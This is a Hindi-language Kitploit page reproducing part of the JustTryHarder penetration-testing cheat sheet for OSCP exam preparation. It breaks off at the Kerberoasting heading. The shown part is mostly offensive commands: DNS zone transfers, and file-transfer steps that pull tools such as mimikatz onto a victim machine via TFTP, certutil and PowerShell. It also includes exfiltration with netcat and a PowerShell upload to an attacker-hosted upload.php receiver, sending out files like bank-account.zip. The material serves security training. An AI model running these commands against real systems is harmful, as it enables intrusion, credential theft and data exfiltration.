Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
JustTryHarder — पीडब्ल्यूके/ओएससीपी परीक्षा की तैयारी के लिए व्यापक पेनिट्रेशन टेस्टिंग चीट शीट, जिसमें विशेषाधिकार वृद्धि, पासवर्ड क्रैकिंग, पेलोड जनरेशन, पोस्ट-एक्सप्लॉइटेशन, पोर्ट स्कैनिंग, वेब हमले और रिकॉनिसेंस तकनीकें शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/sinfulz/justtryharder
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीपेलोड जनरेशनपोर्ट स्कैनिंगशोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsinfulz/justtryharder

JustTryHarder

8361061612 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पीडब्ल्यूके/ओएससीपी परीक्षा की तैयारी के लिए व्यापक पेनिट्रेशन टेस्टिंग चीट शीट, जिसमें विशेषाधिकार वृद्धि, पासवर्ड क्रैकिंग, पेलोड जनरेशन, पोस्ट-एक्सप्लॉइटेशन, पोर्ट स्कैनिंग, वेब हमले और रिकॉनिसेंस तकनीकें शामिल हैं।

रिपॉजिटरी देखें

JustTryHarder

JustTryHarder एक चीट शीट है जो PWK कोर्स और OSCP परीक्षा में आपकी सहायता करेगी।

(PayloadAllTheThings से प्रेरित)

बेझिझक एक Pull Request सबमिट करें और अगर इससे आपको मदद मिली हो तो थोड़ा प्यार दिखाने के लिए एक स्टार छोड़ें। 💖

Hacktoberfest के अनुकूल! हाँ, हम Hacktoberfest के लिए Pull Requests के लिए खुले हैं! कृपया सुनिश्चित करें कि यह स्पैम न हो और वास्तव में इस रेपो में अच्छा योगदान दे। धन्यवाद और हैप्पी हैकिंग!

अस्वीकरण: नीचे दी गई कोई भी जानकारी PWK लैब्स / OSCP परीक्षा के स्पॉइलर नहीं है।

क्रेडिट जानकारी

मैंने इस जानकारी का अधिकांश भाग अन्य Github रेपो, ब्लॉग, साइटों और अधिक से प्राप्त किया है। मैंने मूल निर्माता को जितना संभव हो उतना श्रेय देने का प्रयास किया है। यदि मैंने आपको श्रेय नहीं दिया है, तो कृपया मुझसे ट्विटर पर संपर्क करें: https://twitter.com/s1nfulz

विषय सूची

  • पिंग के माध्यम से होस्ट के OS का निर्धारण
  • BOF (WIP)
  • ब्रेकआउट / एनवायरनमेंट एस्केप
  • DNS - जोन ट्रांसफर
  • फ़ाइल ट्रांसफर
  • केरबेरोस्टिंग
  • LFI / RFI
  • MSSQL / SQLi
  • पासवर्ड क्रैकिंग
  • पासवर्ड स्प्रेइंग (CrackMapExec)
  • पेलोड जनरेशन
  • PHP
  • प्रिव एस्क - लिनक्स
  • प्रिव एस्क - विंडोज
  • पोस्ट एक्सप्लॉइटेशन
  • पोर्ट फ़ॉरवर्डिंग
  • सॉक्स प्रॉक्सी (पावरशेल का उपयोग करके)
  • पोर्ट स्कैनिंग
  • पिंग स्वीप
  • पिवोटिंग
  • रिमोट डेस्कटॉप
  • रिस्पॉन्डर
  • रिवर्स शेल
  • शेल अपग्रेडिंग
  • SQL इंजेक्शन (SQLmap)
  • सुनने वाले पोर्ट दिखाएँ
  • SMB - गणना
  • SMB - इम्पैकेट
  • SMTP गणना
  • ICMP इंजेक्शन
  • VMware (पूर्ण स्क्रीन नहीं जाना)
  • वेब सर्वर
  • वेब स्कैनिंग
  • वेब शेल
  • वर्डप्रेस
  • विंडोज फ्रेमवर्क / पावरशेल
  • विंडोज पोस्ट एक्सप्लॉइटेशन कमांड
  • लिखने योग्य निर्देशिकाएँ
  • करने की सूची
  • धन्यवाद

पिंग के माध्यम से होस्ट के OS का निर्धारण```bash

ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

`TTL` का उपयोग होस्ट के OS का पता लगाने के लिए किया जा सकता है। TTL के तीन अलग-अलग प्रकार नीचे दिखाए गए हैं:

  - **TTL=64** = \*nix - हॉप काउंट; इसलिए यदि आप 61 प्राप्त कर रहे हैं, तो 3 हॉप्स हैं और यह एक \*nix उपकरण है। सबसे अधिक संभावना लिनक्स है।
  - **TTL=128** = विंडोज़ - फिर से, यदि TTL 127 है तो हॉप 1 है और यह एक विंडोज़ बॉक्स है।
  - **TTL=254** = Solaris/AIX - यदि TTL 250 है तो हॉप काउंट 4 है और यह एक Solaris बॉक्स है।

## BOF (कार्य प्रगति पर)

(सामान्य खराब वर्णों में शामिल हैं: `0x00`, `0x0A`, `0x0D`)

  - फ़ज़िंग
  - EIP की स्थिति ढूँढना
  - खराब वर्ण ढूँढना
  - `jmp esp` का पता लगाना
  - `msfvenom` के साथ पेलोड उत्पन्न करना
  - `netcat` के साथ रिवर्स शेल प्राप्त करना

**अच्छे BOF संसाधन:**

  - [NCC Group - Writing Exploits for Win32](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
  - [Corelan - Exploit Writing Tutorial Part 1](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
  - [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
  - [VeteranSec - 32-bit Windows Buffer Overflows Made Easy](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)

## ब्रेकआउट / एनवायरनमेंट एस्केप

  - [Pentest Partners - सिट्रिक्स से बाहर निकलना](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
  - [SRA.io - SiteKiosk ब्रेकआउट](https://sra.io/blog/sitekiosk-breakout/)
  - [TrustedSec - किओस्क/POS ब्रेकआउट कीज़](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
  - [Cognosec - सिट्रिक्स एनवायरनमेंट से बाहर निकलना](https://cognosec.com/breaking-out-of-citrix-environment/)
  - [NetSPI - एप्लिकेशन से बाहर निकलना](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
  - [NCC Group - एनवायरनमेंट ब्रेकआउट के साथ सामान्य समस्याएं (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
  - [GracefulSecurity - सिट्रिक्स ब्रेकआउट](https://gracefulsecurity.com/citrix-breakout/)

## DNS - ज़ोन ट्रांसफ़र```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## फ़ाइल स्थानांतरण

### SMB स्थानांतरण

पीड़ित मशीन पर (Windows):```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget स्थानांतरण

होस्ट से फ़ाइल(फ़ाइलें) कैसे प्राप्त करें (रिवर्स शेल के अंदर).

**सेटअप:** जिस फ़ाइल को आप स्थानांतरित करना चाहते हैं उसे `/var/www/html/` में रखें और `service apache2 start` चलाएँ।

रिमोट सर्वर पर चलाएँ:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64)       # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/)   # <- for folder
```
### TFTP स्थानांतरण

(Kali से Windows में स्थानांतरण कैसे करें)

**MSF का उपयोग करके:**
इन चरणों से पहले MSF प्रारंभ करें:

1.  `use auxiliary/server/tftp`
2.  `set TFTPROOT /usr/share/mimikatz/Win32/`
3.  `run`

**टर्मिनल के अंदर:**
4\. `tftp -i 10.10.10.10 GET mimikatz.exe`

### NetCat (Windows से Kali)

1.  **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2.  **Linux:** `nc -nlvp 4444 > bank-account.zip`

### PowerShell

इंटरैक्टिव सत्र:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
बिना किसी इंटरैक्टिव PowerShell सत्र के (`wget.ps1` बनाएं):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -\> Linux)

**स्थानीय होस्ट:**

1.  `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2.  `encoded.b64` को `nc` या अन्य माध्यम से रिमोट सर्वर पर स्थानांतरित करें।

**रिमोट सर्वर - लिनक्स:**
3\. `cat /path/to/encoded.b64 | base64 -d > exploit.py`

### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### HTTP File Upload (Exfiltration)

**1. upload.php बनाएँ**
हमलावर मशीन की webroot में बनाएँ (`/var/www/html` डिफ़ॉल्ट रूप से).```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. निर्देशिका बनाएँ**
अपलोड निर्देशिका बनाएँ और अपलोड की अनुमति देने के लिए उचित अनुमतियाँ सेट करें।```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. फ़ाइल अपलोड करें**
PowerShell का उपयोग करके पीड़ित मशीन से हमला करने वाली मशीन पर फ़ाइल अपलोड करें:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting
टूल डाउनलोड करें